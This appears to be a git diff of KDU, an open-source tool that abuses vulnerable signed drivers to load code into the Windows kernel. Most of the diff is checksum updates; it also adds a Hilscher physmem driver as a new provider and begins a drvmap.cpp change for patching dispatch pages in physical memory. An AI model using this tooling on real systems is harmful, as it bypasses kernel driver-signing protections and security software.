diff --git a/KDU.sha256 b/KDU.sha256
index 988312c..2c53d1f 100644
--- a/KDU.sha256
+++ b/KDU.sha256
@@ -26,36 +26,36 @@ f12057a99c6b20abf6d9c3df949d794b124ca19b189498ce2beaa5beeb2b077c *Source\Hamakaz
09fa3cdaa1416b81ba5ee304cf24897726902b9d33a76d879f604b7fe26b4dcc *Source\Hamakaze\compress.h
09970cfcb9bfb7a8964ae4ec48fd15c1805e93ea81c858de2793691eefda3881 *Source\Hamakaze\diag.cpp
a4fa97b9f2be414bc49881450d5935d2b48c1029d3bee655cd6e77e645327d74 *Source\Hamakaze\diag.h
-849799b216483d532efa4174e3f2b38d0c812f1ff9b5d98ae41c10c0459f1e04 *Source\Hamakaze\drvmap.cpp
-3155737710664a1a2ca28640687a0cbde115f15ce0b48a4833e87173941d4f00 *Source\Hamakaze\drvmap.h
-79ce8ae7ab618efc0072b6b8baf90b92f6d1af8e9615089d41854c0d85864bce *Source\Hamakaze\dsefix.cpp
+7b15ce1e8654f24a9ac70fdae618fe6c96684bf8462e27d2835da617a51f3308 *Source\Hamakaze\drvmap.cpp
+c62c75c00882d816856f56005eec67a82cf56179d2a4629c4c8bf53707c16c25 *Source\Hamakaze\drvmap.h
+46a4fd4dacc53b917a0894542c786c5db08ac662157438447fa89f71afa615c5 *Source\Hamakaze\dsefix.cpp
5131aa81ffb17238a092b313a954a6d9e9203636ba47562f0a7f8d4daf306221 *Source\Hamakaze\dsefix.h
4c5d5d2f0a0d3e63151c14fafc9a33598ed278b3d2059fa9cd49a08cfbbd3c1f *Source\Hamakaze\global.h
ea0d8d42a5e7d7fb908c52351f99c69f2019c105d07a1f536756691ab2a74174 *Source\Hamakaze\ipcsvc.cpp
888a436b666b00592d29e8a2e82a9b5c7f0c1d4890aaab8cb2f623181ad07092 *Source\Hamakaze\ipcsvc.h
-453492ffb36f26cb4d1fc1ad6c0953be45425f98d5fe8de3f12d768f4d9a947c *Source\Hamakaze\KDU.vcxproj
-67808d9ad6f599957d11e5c36ec3845bcdacb6a97337ef96c41af7e5a9d8564e *Source\Hamakaze\KDU.vcxproj.filters
-7bbc22af4258dd85e73313ea3186e5beb84151b1be26c2952f7cc260577b3491 *Source\Hamakaze\KDU.vcxproj.user
-d0c73c56c8ff26566963332c79992762e8ad83832018267cddab85bd4b1b52ba *Source\Hamakaze\kduplist.h
-9282d0885c4961e896423adf431479d752a91ad7fbf036df4a94a3967510b188 *Source\Hamakaze\kduprov.cpp
-63f837d245a5fb46f68ff5e522d7e46703e01e6ed7bea261245b72fd0802b044 *Source\Hamakaze\kduprov.h
-79e850d593d17f9f6b586050a20f8a1bba5324d92270e2c6f4161b8332c166a4 *Source\Hamakaze\main.cpp
+703feb7327733000bdcadbdc41a0c7a09f92f1f12ccec7ea3071c6371f60c23d *Source\Hamakaze\KDU.vcxproj
+a62576fdaf4fa1fa3782427c9662c7708af81a81b5703ce8d1a5d3bb4d680bde *Source\Hamakaze\KDU.vcxproj.filters
+b3272c6ec95065c5d293cd256f6f395d1d7b6b8dcac6e49cb1d96806d563593e *Source\Hamakaze\KDU.vcxproj.user
+a224b5276d3006e16d8bb6b5ef6c701842678612dbcfafb53a840eb174ecfca2 *Source\Hamakaze\kduplist.h
+4622665b799f0b2a5c77f4dfafc250c4d882fc3105cf9306fc888f678cd8563b *Source\Hamakaze\kduprov.cpp
+13a842b3bc62995ab8071ae56df74065d6a1388fcda66884012c6d8addb94055 *Source\Hamakaze\kduprov.h
+ace87ca919d2502c47d147814808e42b892b38cf9092aa69a3dad5f44da05323 *Source\Hamakaze\main.cpp
e1a8de39e2d3d0bae5d9bbe1b18e849f5d070feb1d37f838176ede5a401f35ec *Source\Hamakaze\pagewalk.cpp
545ecf7e669b6b28753a02e33fae6f503750d26cf0bf9089701f401fd24e0dd1 *Source\Hamakaze\pagewalk.h
40067200848300c557bb687db61734f658704afb7ad3be07e4108d80f32c9d48 *Source\Hamakaze\ps.cpp
eb15810b52b16482f3a3a679fbeed102257bfa0416243e74fce5b634daf9b074 *Source\Hamakaze\ps.h
6ab34cc400e37c37605e0b04b076f9464172c6e1ae749b19f7d0c73f2d7177e3 *Source\Hamakaze\resource.h
-356fa09c4d7e27356dd7076996390ab96a3d338b5a9bdb5e3f6a6559ceae18a5 *Source\Hamakaze\resource.rc
-0b63700349f8d478225c5df53b4c18074fc927a46367b73115e40738cbab5480 *Source\Hamakaze\shellcode.cpp
-37b72edb872268e4e9f8a12853f4cbf726038cf7f0dc5e0f4239888818f18fed *Source\Hamakaze\shellcode.h
+0e45f111f473a67af47b123434e1e1982ef1dc0c6f1bfa250b78402a69fa5df4 *Source\Hamakaze\resource.rc
+c617a2090e51738ba9aadff46c573fcf57caada21219ed673ee0f8998e35a831 *Source\Hamakaze\shellcode.cpp
+87c7274c6e821eb447ec87b63b0a058c59f0e64f0c109cfc1d529fb8e2f25150 *Source\Hamakaze\shellcode.h
5428b9eb02810dbc4bfd715ec657ee35a5e61e53079c65f05e1eea4f8a6fa4a0 *Source\Hamakaze\shellmasm.asm
-e35386b3196b64c28fcd8f09eeb8b74adab7ec05ccf38b4041cee4b04f9eab1f *Source\Hamakaze\sig.h
-cf7a0bee79420caa31bc825151ca226b8627e90eb7c6e925dd39882b2456f5a5 *Source\Hamakaze\sup.cpp
-988501759bf5c44868569724ea249f22da600675a012aa2f59dccafe97b3e164 *Source\Hamakaze\sup.h
-23a3857c01b3decee12138abcb90ec8e7751c7eec3038c546a47b9b76465b770 *Source\Hamakaze\tests.cpp
+879eea1c38c0c408e3634d0ed2eeae2b8b21e1040b4b0988ea4d802de0ecd21e *Source\Hamakaze\sig.h
+7f97a97deea91390c87c759869e069635be6a329ffc941d53da86cfa0ecf1522 *Source\Hamakaze\sup.cpp
+a13d8320351de7e0366dc935271be1e53bd0e69fa02f3141de67cbf71e5f3155 *Source\Hamakaze\sup.h
+69fc5422986ab04061534187cd268026be3eba3f38600a3a7b173ee6314b7549 *Source\Hamakaze\tests.cpp
ad77ae168188a9748713ab5f7532447ca50a539fa8ebbec5ac86b273696b028e *Source\Hamakaze\tests.h
-0fd6c0631ae553d443bd01c502b8917379316530bf6de0a5f4204331ddb7664d *Source\Hamakaze\victim.cpp
-b4165a29658b4770627aaac15bc36add0a47892d738920de1fc6ec73bb1c3cce *Source\Hamakaze\victim.h
+8046da85c2f9853496b369fa63fe1b89d47583d5367db4a49edfd9f52426e6d7 *Source\Hamakaze\victim.cpp
+5b82accd00d244d77f107a7b8ff0253548a463e642976c36f76e85649e60fe8e *Source\Hamakaze\victim.h
e98c66a33ec03a82fc98ef442b392e3c6221dcb39c1cb695cd983e1b55695d94 *Source\Hamakaze\wdksup.h
31860c95db21761086e2979753e981d6435f27435dead3ed7e4687e99bb878d4 *Source\Hamakaze\hde\hde64.c
fd5b39e2865e12b9525ebda8fd9e9658b341ead5932d1bcb412a189f81ca42ca *Source\Hamakaze\hde\hde64.h
@@ -63,11 +63,11 @@ fd5b39e2865e12b9525ebda8fd9e9658b341ead5932d1bcb412a189f81ca42ca *Source\Hamakaz
0b6c69ad498e67907e0c574ab06123aee4ec30c99fa181099ea929a8d820bfc1 *Source\Hamakaze\hde\table64.h
76295f1463903ba5ed48ec7e04bb7c43ec4f0b76f112141aedcdbc6cc3355039 *Source\Hamakaze\idrv\alcpu.cpp
98a21df59cb881c1029a8a6c1ad30c9481075c2e4b1fb43969ee6607816b9c9f *Source\Hamakaze\idrv\alcpu.h
-251fc648b3592c5e9b9e6085b5a58786ae0b2690b0cd85d9fc4f8a7c80689b84 *Source\Hamakaze\idrv\asrdrv.cpp
+de5286bda6dd23940fb2cc0f0e5d3cd12bad73ffdcf30259bc254047a5f1142f *Source\Hamakaze\idrv\asrdrv.cpp
1c2c5b6a7addf3389a6dee6b11e4a4648d403e9c456008ecefbc79deaa34afae *Source\Hamakaze\idrv\asrdrv.h
b1350783a851e6345b880c8a5313e871d2249aa5524f41406c52fa62483f2229 *Source\Hamakaze\idrv\atszio.cpp
015a6aff991174a881650c61fe1b28c5bfe3116a02a32abe5295ff389c5b7099 *Source\Hamakaze\idrv\atszio.h
-bc249421f95d6a54cf9cb0aae0d717dada4f96a536147014a952d45c99243622 *Source\Hamakaze\idrv\dbk.cpp
+515a1a8dfc78af4f8a3a1c832140b033ebc1064386f716729d6e626cde1d590b *Source\Hamakaze\idrv\dbk.cpp
24f81b4fdc1b924a36c981fb175b2dccebd7d029d6caed85fb731b74b22c7386 *Source\Hamakaze\idrv\dbk.h
e7a1432ad47fb4d73d9300a6fdc2ae4fa2906821db327c028fdff15c660e4690 *Source\Hamakaze\idrv\dbutil.cpp
ad955406989b80564e7e4cc400721e62d6d5c193e22037b075e07dd616f3c845 *Source\Hamakaze\idrv\dbutil.h
@@ -75,6 +75,8 @@ ad955406989b80564e7e4cc400721e62d6d5c193e22037b075e07dd616f3c845 *Source\Hamakaz
73a97fa34df9c0733981536f2079d1eab89bfaf36b4c5d0003cb87d504764ec3 *Source\Hamakaze\idrv\directio64.h
65c53a700fff2f766420a7e0612446aed7ef8f04fd44162ff73c0ba7e3581d77 *Source\Hamakaze\idrv\gmer.cpp
89d1cfb34afec23dbda6f40030a95386e9bbbc395666e2c0a3d066dc2fa8b0b8 *Source\Hamakaze\idrv\gmer.h
+865bba446ad9f202f2bea58aec4cf48fa87448105dee2fb69caab37ec54f66e8 *Source\Hamakaze\idrv\hilscher.cpp
+db94f36f0d3b946500352ab07393994f0a09e2737a63e1cdbedd3da16c72cb2d *Source\Hamakaze\idrv\hilscher.h
ae9dd179c7fdc2b1a4741399e64fa9d4a13d22b7fad45cedea9ce285fe7399ea *Source\Hamakaze\idrv\kph.cpp
4bcb0021a14e1d793d9df9f91c4fd261885f4583d36d350661e604fdf407f5d8 *Source\Hamakaze\idrv\kph.h
f3c889ede5142f88b54d3e5e973b46f0fb897d306695de82df9c683f72774fb8 *Source\Hamakaze\idrv\ldrsc.h
@@ -90,7 +92,7 @@ ce53137a648e55c800e6641b9cb3bf9c148598bbb47972b947f4e4620ae61c9d *Source\Hamakaz
5cb51cbc6d2b2e3174fc2ebbb713e32c34d4d367f299060f400dac331183d236 *Source\Hamakaze\idrv\nal.h
f9463d258e2528738ee749a86683079e8b870b8c84d292352952be207b9daff5 *Source\Hamakaze\idrv\phymem.cpp
399a9ced700381d0e3641f2d97a3e9f5dd59cbe22098ac9c0178454f9060d412 *Source\Hamakaze\idrv\phymem.h
-28422f3942e14e4205e3a282ae52f93e6bb784516d16561b48e65a35d59c7db5 *Source\Hamakaze\idrv\procexp.cpp
+0f30979d4ffbfa0d6b56fda86bfd8974b34d4acf5b4258be263a84b8d02c4ebe *Source\Hamakaze\idrv\procexp.cpp
8449d829c3285f5a22521fba0db1516c487818f901fd28939fc18fbc3da0eedb *Source\Hamakaze\idrv\procexp.h
bd0c80bc267d1fa0b423a453a22958a8b1ab1ede29291217cc045a9a877a347f *Source\Hamakaze\idrv\rtcore.cpp
08f75ea88874a507c132bafc412c88f9cc9862f78c238dcbd0cc480a04a438f4 *Source\Hamakaze\idrv\rtcore.h
@@ -100,16 +102,16 @@ a0ed8a22c14b35bccd1ff0f45c8b23cad0f8c3af1d8e924caf4bfd63dfb02d89 *Source\Hamakaz
36ec0baeec7b61dbd9936507fcf1bf5aefec08e96ffe3bcb4883785ea2d9a542 *Source\Hamakaze\idrv\rzpnk.h
48cd4fcd61fb5649064726cb7cc42e9977240c11731cf32a4e971eb39ab51b3d *Source\Hamakaze\idrv\winio.cpp
d0e354d2f97e993e5e40fb6bb2b99b5bc753beb23f8213d44f99c0309210c1e8 *Source\Hamakaze\idrv\winio.h
-1efd3d1587a63c8afaae9d1b35f37cbb3885332612091cc0f564b5a2c6930444 *Source\Hamakaze\idrv\winring0.cpp
+21c357fab30206cb0942e2fbfef6716b2f315d3620827ee32db451a2ebbc3c7d *Source\Hamakaze\idrv\winring0.cpp
103f50efe410f8668c40ddc68051ba49aa0ee1a5301cb54bc42991523c0edae9 *Source\Hamakaze\idrv\winring0.h
-9a92bda63624239e5dec54cf94a43ad396efe1ad59465f1359b0aaa94cbe8e11 *Source\Hamakaze\idrv\zemana.cpp
+524cb55125d1998b60a259ce689164494810979ade21bf5d23e658feeef845f2 *Source\Hamakaze\idrv\zemana.cpp
da1ea3c2ceebfdc6e5c338461dc214798870a0d6aa16f7f23c045123fa450f71 *Source\Hamakaze\idrv\zemana.h
de7bdf0bd4acec31c963b916331399bce23c155e3002f0a8152a4a36af13faf8 *Source\Hamakaze\res\274.ico
-e4c9e433ddad49bf69f67419a999b657848fe030c9f784ad2be2157051800984 *Source\Hamakaze\res\SB_SMBUS_SDK.bin
-1895eac97152d51f1742b2a6899f6fd4804d672e3d67017e2c540c2dc8437f09 *Source\Hamakaze\res\Taigei32.bin
+37b29350e54c8521ac5d6aab8c29cf21ab3ef91f82724ea275dab5fec0381836 *Source\Hamakaze\res\SB_SMBUS_SDK.bin
+2fc5df446424283a11aadd3348fcf1c597f915671ef54767bd50a076998833ad *Source\Hamakaze\res\Taigei32.bin
1232f65b57bc8732ead29a730308f6c67bc53a2f9fafd47f8c7cc4b4f676a9e9 *Source\Hamakaze\utils\GenAsIo2Unlock.exe
-a8bbfe3737b1a8bf3757489724a2562840b64e3e29dde11f569887c1910c153c *Source\Shared\consts.h
-1b804d8eaf2fc0f55d24b380064e07f84feb49f86b731368a6d6c0a6ba9a7127 *Source\Shared\kdubase.h
+ed4006b58c2034270ea2e754b974ab1e255d117ade38dd9e81a78a30243a91d5 *Source\Shared\consts.h
+f1122c2a5b1aedef180b0f28b61710cf1260d0a13f89bf60f1aa971106b20fc4 *Source\Shared\kdubase.h
e0ba365c8aa8e66fddd0f28bca4b827725911480fdcd968df2792c370f13ef42 *Source\Shared\ldr\ldr.cpp
37003367e625e218bf7e4c22850ac7d2efe926a6a832d29bc20a9f8b19a479af *Source\Shared\ldr\ldr.h
893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Shared\minirtl\cmdline.c
@@ -151,48 +153,50 @@ d563bd3017a274175ca6b7e8f93333a3e3ec096d1f3034acfa4e17d8b2420c99 *Source\Taigei\
c06a75b13f855a94d46616796e024c52b499f8f92cf00ccb571ddbc6ff574676 *Source\Taigei\Taigei.vcxproj.user
9e82ce97464b666dad14ffde32e5450a0974d1194ca68cd10e9b2611599dfc28 *Source\Tanikaze\export.def
5bbbcc6c275008ffdd765a3fa53ed3e4ae16ea51bf6ae66c2271f6f065ba0525 *Source\Tanikaze\main.cpp
-85769e09a6b8f28a1702a2b418fd0410f4d866225198bfb49a8118c6ab7c44cc *Source\Tanikaze\resource.h
-ed1f7dbef4a0fe0f487044c8662d52997a3da7907d6ba06707a8fc6251230c72 *Source\Tanikaze\resource.rc
-ba591c91af1581f4ef1e59bded47362240e7e9fd42d71e3dc2993aefd4139343 *Source\Tanikaze\tanikaze.h
-653ed60972f46872b43a5a485abdd027e112cd9b8f041d3ee7615d304b7feb53 *Source\Tanikaze\Tanikaze.vcxproj
-3e9b2bebcfbe721011494bac7582a72f290580a1c7cdbc642596d7c8516e441e *Source\Tanikaze\Tanikaze.vcxproj.filters
+8daf6cb5b74792712db6c7ded2328cd297b987870e84754edbdc52d43fc6d88e *Source\Tanikaze\resource.h
+9fbf52142a304577ff4155e7c958def354b9ce145faa9f5501f9387822cd1630 *Source\Tanikaze\resource.rc
+d0a290dd0dc73de74f21d0a06d5418e3e427af92abb297962bc183554906382e *Source\Tanikaze\tanikaze.h
+ff036adba02e6fc3b28b9d19a2db5b4004a2973bead146470132a4782e58cdeb *Source\Tanikaze\Tanikaze.vcxproj
+c17934d2254a6965a6a8f08ed5572e8ca8f2a5e319c126bd02435e2a5e7aebfe *Source\Tanikaze\Tanikaze.vcxproj.filters
c06a75b13f855a94d46616796e024c52b499f8f92cf00ccb571ddbc6ff574676 *Source\Tanikaze\Tanikaze.vcxproj.user
e5b34092e5966007527d8947c0ca7fd2743d15ef33dcbfa6350ccf4f25a39e2c *Source\Tanikaze\data\AsusCertService.bin
-2fc87991b1e2cd078b36d207c198d4a7597967f9567496a60d621307d2ffa10a *Source\Tanikaze\data\dbutilcat.bin
-8b2e5ac07302d967fdc7cedbc3a92634db254f4e5e4a0f0f951fdd52f4706ed0 *Source\Tanikaze\data\dbutilinf.bin
-ef558697fedc6ac7bc4a4ef4c6b7843a28b2ea170a5cb2f1ff2dfea767be8c29 *Source\Tanikaze\data\KMUEXE.bin
-cdc55b53f18a2e7108783ad35dd02ec8180da709cbb9944f33da84f0125a0c22 *Source\Tanikaze\data\KMUSIG.bin
-177810f5deefebc84736a5deef85abc8626d9536e31c11cbd749a6ba4f1dee0f *Source\Tanikaze\drv\ALSysIO64.bin
+bf28fc1cf75228c4444d64505f45d064c963360ecfac030eeed61d07c71adb15 *Source\Tanikaze\data\dbutilcat.bin
+4c1ba3e30bbe1948f54ee9dd531cb92e968d9a3c2bbd1ed22bdef17f0e7b3530 *Source\Tanikaze\data\dbutilinf.bin
+5ad7c9ad80c6cf4511045502e7f3d8da401330baee1b998f39b3f1c73035e3fc *Source\Tanikaze\data\KMUEXE.bin
+f8d9c5e43d7773acf0377ebbf37f579627bf071535e9c0a38b7fda1649c750ef *Source\Tanikaze\data\KMUSIG.bin
+475a31cc31b610fc3c0c5fafb702db57317eac7114b298e80c472759cf872bda *Source\Tanikaze\drv\ALSysIO64.bin
9037d39509d73a7cf38ed40ece7f07dc4511e8eb47f4dcd6be53b9d251eb5a20 *Source\Tanikaze\drv\AMDRyzenMasterDriver.bin
-86fa99019b48f86279c132d73cb0d4ace153f946b2894f5da1bed0374b30e785 *Source\Tanikaze\drv\amsdk.bin
-f7f22651f4e812d3a4a01b4d10fc11fe67c5e0225a3e246a301457b4f5129cad *Source\Tanikaze\drv\asio2.bin
-5c333394897e6e4674c3f9711685b0ac39d97b485433440840d16b9e0da961d3 *Source\Tanikaze\drv\AsIO3.bin
-c54e4ed8fc8ee65be5bf90d2bc07771281fe1a0c60e48d0353d40cb2448acf1a *Source\Tanikaze\drv\AsrDrv106.bin
-9e01a403023b369852cc17b51ddc984e78d30a409c55bd27ec54c99788582f1e *Source\Tanikaze\drv\ATSZIO64.bin
-0bd05c6088d906efdd84877f693d698393157393bda36d526170a8192c4c72ee *Source\Tanikaze\drv\dbk64.bin
-474246e4295be8ba6cbebebf094d43cc7fe3fabadf68cfea97b581556b92487f *Source\Tanikaze\drv\DbUtil2_3.bin
-5e854a3f2854bcaf9619655849ab37091202bdcdf7cf4cb2c83f72294b11b12a *Source\Tanikaze\drv\dbutildrv2.bin
-0617a3539b05223c88de2904fe1830d22d84498c0e517a58fb83c49c9658971b *Source\Tanikaze\drv\DirectIo64.bin
-c4ba2ccf8f9f6517f286c3a72802dff0519b59b02ac0ae7899c081ad75e90a9a *Source\Tanikaze\drv\DirectIo64_2.bin
-20b21c980e134585d21cd0eb17ec303cb96149e2310008e547b4acb6e070d42c *Source\Tanikaze\drv\ene2.bin
-7eab2260c44d299a532679cdc59ad73199c6ca312473e4e0af59811dabac5866 *Source\Tanikaze\drv\EneIo64.bin
-9eb9e88e8182e82bfc2eeaf53a383dfae6a22c9df0e9d4db0bf3bf8d2ce45df2 *Source\Tanikaze\drv\EneTechIo64.bin
-20aa1739fb0ad2d8f426064b93a0931f898fbdee2587ec3df8228f6aa24c4e6f *Source\Tanikaze\drv\gdrv.bin
-3bb4b9bed6ec54a88e86530fb8d95df8f7cbe64d17b325663f815deba425c600 *Source\Tanikaze\drv\GLCKIO2.bin
-308bf61fabaa9d29c79dc92b72527810b773c608ca1afa5c98cd61d916acd726 *Source\Tanikaze\drv\gmerdrv.bin
-dc4d77a8bcc3e3fdfe5c9bc15b67261d5f301d588d28e69d05767076f60f3964 *Source\Tanikaze\drv\HW64.bin
-6a1e71d32a56a497706541d8e2b1283ae65413be6cb9580837274259bb638124 *Source\Tanikaze\drv\inpoutx64.bin
-cabed16eceebb7399d565eebf50023f1d10c7e7a99a096c7f6240e2a96c2b0a7 *Source\Tanikaze\drv\iQVM64.bin
-cb7c160ebfd3013859c811c42dfbd6ba1e327d299ce304766edbc2c403259a22 *Source\Tanikaze\drv\kprocesshacker.bin
-0d792ba47a116c951d9d6fccb13007229db8c2e0ed1a8774189c4b2ef2c9a6d8 *Source\Tanikaze\drv\lha.bin
-36ea25d89914797b480159428b17cb3dbb6671a568c23c4797053c3da193b082 *Source\Tanikaze\drv\mimidrv.bin
-34ed60208e2e4e1ab06439871d3ff07231a882a7fb5392a3a5177f543d66f2f0 *Source\Tanikaze\drv\MsIo64.bin
-7e8d7e6c50ae7c514af0510684f035f2b14ab13a5ef78130ecb7218eb5b21857 *Source\Tanikaze\drv\Phymemx64.bin
-909f12a24d007b9886f37d789ab04f8a306cb96a9ab450912c107c5bd50e2200 *Source\Tanikaze\drv\procexp.bin
-7d0bdea24cac97d348a002c55c051bab86eb3c4ed7d45ec33ad1e78ab433a1fe *Source\Tanikaze\drv\RTCore64.bin
-fc69bce06f920e67783af2051a9cc950231e1bc4cac17f2d79bd2818853a3131 *Source\Tanikaze\drv\rtkio64.bin
-20d33bf70f69cb34ed5f5c46ba83521e57a10215956f26cdab4e42a3d6831113 *Source\Tanikaze\drv\SysDrv3S.bin
-504a606086c4480b33870ffa29d0f9d7ecb313560ca83c7c52c7a3f71bda113c *Source\Tanikaze\drv\WinRing0x64.bin
+be1350c61d6cffca82513ee2fc171bae05d21504079498a99b36a42e3d9f5c0b *Source\Tanikaze\drv\amsdk.bin
+a4dfa521372c860c2fec697fb812b11c235059ebe0d7d67b177d18c94fb9d5f5 *Source\Tanikaze\drv\asio2.bin
+d3f56d7e3152bcc6aa32ab7362cab2b2558455ca46aed303358c0563d5131958 *Source\Tanikaze\drv\AsIO3.bin
+f35ca639b8401dffd10aae08c2a79d0dfcb2709d4088ad222381e92a2decd048 *Source\Tanikaze\drv\AsrDrv106.bin
+207cd5287d1de9d2a67c0a8bfe1d60a6352044a74dbf60cfa67c6ab75c727259 *Source\Tanikaze\drv\ATSZIO64.bin
+5e46458eff1cbba96b51d96edf2e83e56a412c91529d19c5ac7e4fda48068252 *Source\Tanikaze\drv\dbk64.bin
+bbc4aef5747452a8f1f25e56ed4dd0d4e0e974de2fbe30f46c6c2e1f75569e3e *Source\Tanikaze\drv\DbUtil2_3.bin
+6f654ce6fc41913707076409fd1847595ecb5a3c17fffb93ff9cce54261310ec *Source\Tanikaze\drv\dbutildrv2.bin
+7bd7a152edbf57d34543e296455fda492e6ebbe7576cdad3b4b83ee68df34e4e *Source\Tanikaze\drv\DirectIo64.bin
+4374308cca737db252ce897db1e3902acf105b59127c2a636789461d4992303d *Source\Tanikaze\drv\DirectIo64_2.bin
+82ae0b60cfb1db183e11b2dd780616667f599e8cddcb10b0682b0d5fc3d0d934 *Source\Tanikaze\drv\ene2.bin
+fd0e0357a6ec0f478f28f9e7edcdab4de3c1afdd60ddc2595b404c778eec0f77 *Source\Tanikaze\drv\EneIo64.bin
+dd2ddd096b6fe4478d8faadc4646b85e02bd9ccd8d8611764a04bcca69ab0f38 *Source\Tanikaze\drv\EneTechIo64.bin
+d01ab171487a56241bbc424b7e62766e1e2ffe474b588c3dfce08ae533bf1a50 *Source\Tanikaze\drv\gdrv.bin
+a34ccc9d93d53fb7e43cdf7448211d67ddf3ec7fc8ee50994d45ce42fa5be9fe *Source\Tanikaze\drv\GLCKIO2.bin
+df434c67e2e11b5e507d1fd96724c8e25a2fd1ee953ec229546ec07199d39a98 *Source\Tanikaze\drv\gmerdrv.bin
+04996fd18302bc54f2727c1443e52cc15bdf8ecfbdda3368d0af84dc9b7c7c6d *Source\Tanikaze\drv\HW64.bin
+19f5b948413d487fe1268dc44192e18c38b1c912077d5c22a6bc9e75859837f2 *Source\Tanikaze\drv\inpoutx64.bin
+1e4ad240ffc5dca1ba78b17128506192e81793d21e114bdde940f9d7323023fd *Source\Tanikaze\drv\iQVM64.bin
+3d525411632c8bc5d8fb6dd002d5cf16e2db21568642933a88a51e1e8633b506 *Source\Tanikaze\drv\kprocesshacker.bin
+bddab9fc551c94a4254c4bb532223254f9f922c3586350ae6ba5d5ce46f4c338 *Source\Tanikaze\drv\lha.bin
+328a955462eb3cb7afe5961a44703084e0a185a734faaff84e5b74e13a994732 *Source\Tanikaze\drv\mimidrv.bin
+ab27dcd20a3a8a7b9c59767c2cddc176076f3bed4d639a93ac7bfd60f3d0e540 *Source\Tanikaze\drv\MsIo64.bin
+66e6f0931f5796381704e9352b6f5c9b4b779bf224ab0f24ca2c7cd2204b661f *Source\Tanikaze\drv\Phymemx64.bin
+e4537e65c80490987d400c6b4929ffc830c187c399ed72eb31a4f290c5dbec44 *Source\Tanikaze\drv\physmem.bin
+8db0eaf0acadcf6f38d1b0d6f2d6b8542ec5ebaca730f177e644aac96a37526c *Source\Tanikaze\drv\procexp1627.bin
+44ef6ddbb1a0ce9eef4cc573ee1e470836533600a4e443702468e052ba9d5ce5 *Source\Tanikaze\drv\procexp1702.bin
+e2d4af8b8585d062f7c0ea90c94f94c1fcaefa8654f676b7becda0e554ca8779 *Source\Tanikaze\drv\RTCore64.bin
+69f688c2479a955ee8e8e00475e2d2ba3c75d774e33f3443b0bbe27b1ab7e3e6 *Source\Tanikaze\drv\rtkio64.bin
+9ef4ffcedee2f85c105b5a4e4fd394ddf5f91b1d50b35904f6ce496bed62ea88 *Source\Tanikaze\drv\SysDrv3S.bin
+9075e85a4e4bc2c0ac3e40ec9c79e72eb1944a078dd0dc6a1fbb0ca0772489b4 *Source\Tanikaze\drv\WinRing0x64.bin
bf86c929ee9ee2bb88187e1d82bcddfe83375c73e6787b83a7e414dff691e35b *Source\Utils\readme.txt
c776bc97ee2fbe48d3e148bb37c887862e6de212d4391d6df9b5f149e40ed223 *Source\Utils\GenAsIo2Unlock\GenAsIo2Unlock.sln
c4a28bc43a63a40ff2d8699fa261ee1ced6783d199043484ea7921e8d078ea08 *Source\Utils\GenAsIo2Unlock\GenAsIo2Unlock.vcxproj
diff --git a/LICENSE.txt b/LICENSE.txt
index 051953a..c719937 100644
--- a/LICENSE.txt
+++ b/LICENSE.txt
@@ -1,6 +1,6 @@
MIT License
-Copyright (c) 2020 - 2022 KDU Project
+Copyright (c) 2020 - 2023 KDU Project
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
diff --git a/README.md b/README.md
index ea0bceb..9816d68 100644
--- a/README.md
+++ b/README.md
@@ -135,6 +135,7 @@ You use it at your own risk. Some lazy AV may flag this tool as hacktool/malware
| 28 | ASRock | AsrDrv106 | Phantom Gaming Tuning | RWEverything | 1.0.6 and below | |
| 29 | Arthur Liberman| ALSysIO64 | Core Temp | Original | 2.0.11 and below | |
| 30 | AMD | AMDRyzenMasterDriver | Multiple software packages | Original | 2.0.0.0 and below | |
+| 31 | Hilscher | physmem | Physical Memory Viewer for Windows | Original | 1.0.0.0 | Cert, Name |
###### *At commit time, data maybe inaccurate.
@@ -209,4 +210,4 @@ They are used in multiple products from hardware vendors mostly in unmodified st
# Authors
-(c) 2020 - 2022 KDU Project
+(c) 2020 - 2023 KDU Project
diff --git a/Source/Hamakaze/KDU.vcxproj b/Source/Hamakaze/KDU.vcxproj
index e815f36..52cc082 100644
--- a/Source/Hamakaze/KDU.vcxproj
+++ b/Source/Hamakaze/KDU.vcxproj
@@ -141,6 +141,7 @@
+
@@ -188,6 +189,7 @@
+
diff --git a/Source/Hamakaze/KDU.vcxproj.filters b/Source/Hamakaze/KDU.vcxproj.filters
index c69bb6f..9c8b647 100644
--- a/Source/Hamakaze/KDU.vcxproj.filters
+++ b/Source/Hamakaze/KDU.vcxproj.filters
@@ -183,6 +183,9 @@
Source Files\idrv
+
+ Source Files\idrv
+
@@ -341,6 +344,9 @@
Source Files\idrv
+
+ Source Files\idrv
+
diff --git a/Source/Hamakaze/KDU.vcxproj.user b/Source/Hamakaze/KDU.vcxproj.user
index c665ea0..e9f3ec8 100644
--- a/Source/Hamakaze/KDU.vcxproj.user
+++ b/Source/Hamakaze/KDU.vcxproj.user
@@ -1,11 +1,13 @@
- -prv 30 -map c:\install\dummy2.sys
+
+
WindowsLocalDebugger
- -prv 30 -map c:\install\dummy2.sys
+
+
WindowsLocalDebugger
\ No newline at end of file
diff --git a/Source/Hamakaze/drvmap.cpp b/Source/Hamakaze/drvmap.cpp
index 0076a63..a540c5b 100644
--- a/Source/Hamakaze/drvmap.cpp
+++ b/Source/Hamakaze/drvmap.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2022
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: DRVMAP.CPP
*
-* VERSION: 1.20
+* VERSION: 1.30
*
-* DATE: 10 Feb 2022
+* DATE: 20 Mar 2023
*
* Driver mapping routines.
*
@@ -447,7 +447,7 @@ PVOID KDUSetupShellCode(
supPrintfEvent(kduEventError,
"[!] Unexpected shellcode procedure size, abort\r\n");
- ScFree(pvShellCode);
+ ScFree(pvShellCode, ScSizeOf(Context->ShellVersion, NULL));
pvShellCode = NULL;
break;
}
@@ -462,201 +462,246 @@ PVOID KDUSetupShellCode(
}
/*
-* KDUCheckMemoryLayout
+* KDUPagePatchCallback
*
* Purpose:
*
-* Check if shellcode can be placed within the same/next physical page(s).
+* Patch dispatch pages in physical memory.
*
*/
-BOOL KDUCheckMemoryLayout(
- _In_ KDU_CONTEXT* Context,
- _In_ ULONG_PTR TargetAddress
-)
+BOOL WINAPI KDUPagePatchCallback(
+ _In_ ULONG_PTR Address,
+ _In_ PVOID UserContext)
{
- ULONG dataSize;
- ULONG_PTR memPage, physAddrStart, physAddrEnd;
